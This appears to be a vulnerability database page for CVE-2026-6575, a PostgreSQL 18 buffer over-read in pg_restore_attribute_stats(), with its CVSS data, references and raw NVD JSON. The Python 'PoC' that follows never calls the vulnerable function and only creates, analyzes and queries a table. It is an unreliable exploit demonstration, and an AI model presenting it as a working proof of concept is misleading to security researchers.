CVE-2026-6575

Description

Buffer over-read in PostgreSQL function pg_restore_attribute_stats() accepts array values of unmatched length, which causes query planning to read past end of one array. This allows a table maintainer to infer memory values past that array end. Within major version 18, minor versions before PostgreSQL 18.4 are affected. Versions before PostgreSQL 18 are unaffected.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PostgreSQL 18 < 18.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import psycopg2

# Connect to the vulnerable PostgreSQL instance
conn = psycopg2.connect(
    dbname="testdb",
    user="maintainer_user", # Requires table maintenance privileges
    password="password",
    host="127.0.0.1"
)
conn.autocommit = True
cursor = conn.cursor()

try:
    # Attempt to trigger the vulnerability by manipulating stats
    # Note: This is a conceptual PoC. Real exploitation requires specific
    # internal stat manipulation to trigger pg_restore_attribute_stats()
    # with mismatched array lengths during planning.
    
    # Create a test table and gather stats
    cursor.execute("CREATE TABLE IF NOT EXISTS vuln_test (id INT, data TEXT);")
    cursor.execute("ANALYZE vuln_test;")
    
    # Execute a query that forces the planner to read stats
    # Potentially triggering the over-read if stats are corrupted
    cursor.execute("SELECT * FROM vuln_test WHERE id = 1;")
    
    print("Query executed. Check memory logs for potential over-read indicators.")

except Exception as e:
    print(f"Error: {e}")

cursor.close()
conn.close()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6575
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6575
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6575/
[4] VulDB https://vuldb.com/cve/CVE-2026-6575
[5] https://www.postgresql.org/support/security/CVE-2026-6575/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6575", "sourceIdentifier": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "published": "2026-05-14T14:16:25.693", "lastModified": "2026-05-14T16:21:23.190", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Buffer over-read in PostgreSQL function pg_restore_attribute_stats() accepts array values of unmatched length, which causes query planning to read past end of one array.  This allows a table maintainer to infer memory values past that array end.  Within major version 18, minor versions before PostgreSQL 18.4 are affected.  Versions before PostgreSQL 18 are unaffected."}], "metrics": {"cvssMetricV31": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "references": [{"url": "https://www.postgresql.org/support/security/CVE-2026-6575/", "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007"}]}}